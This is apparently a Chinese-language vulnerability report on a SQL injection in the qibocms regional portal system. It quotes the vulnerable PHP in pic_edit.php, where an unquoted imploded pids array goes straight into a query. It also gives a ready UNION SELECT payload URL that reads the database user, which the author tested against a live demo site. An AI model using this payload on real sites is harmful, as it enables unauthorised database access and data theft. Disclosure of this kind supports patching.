qibocms 地方门户系统 注入#3 (demo测试)

### 简要描述： Fighting ### 详细说明： 在/hy/member/homepage_ctrl.php 中 ``` if($atn&&eregi("^([_a-z0-9]+)$",$atn)&&is_file(dirname(__FILE__)."/homepage_ctrl/$atn.php")){ require_once(dirname(__FILE__)."/homepage_ctrl/$atn.php"); } ``` 包含文件进来 hy\member\homepage_ctrl\pic_edit.php中 ``` if(count($pids)<1) showerr("至少选择一项"); $pids=implode(",",$pids); $query=$db->query("SELECT * FROM {$_pre}pic WHERE pid IN($pids) ORDER BY orderlist DESC"); while($rs=$db->fetch_array($query)){ $rs[posttime]=date("Y-m-d H:i:s",$rs[posttime]); //$rs[url]=$webdb[www_url]."/".$user_picdir.$rs[url]; $rs[url]=tempdir($rs[url]); $listdb[]=$rs; } ``` $pids=implode(",",$pids); 这里成字符串后 然后就直接带入到了查询当中 且无单引号。 所以可以直接注入了。 注册个会员 hy/member/homepage_ctrl.php?atn=pic_edit&pids[]=1) union select 1,2,3,4,user(),6,7,8,9,10,11,12%23 [<img src="https://images.seebug.org/upload/201410/261702222b76c8a56c32b2a05962f0181916bd5b.jpg" alt="9.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/261702222b76c8a56c32b2a05962f0181916bd5b.jpg) 测试一下demo: [<img src="https://images.seebug.org/upload/201410/26170319485e8c2ff2ab681d7154cb2cb97517da.jpg" alt="10.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/26170319485e8c2ff2ab681d7154cb2cb97517da.jpg) 构造一下 [<img src="https://images.seebug.org/upload/201410/261703584e2a613e7513aaabbac7549bb30414a3.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/261703584e2a613e7513aaabbac7549bb30414a3.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201410/261703584e2a613e7513aaabbac7549bb30414a3.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/261703584e2a613e7513aaabbac7549bb30414a3.jpg)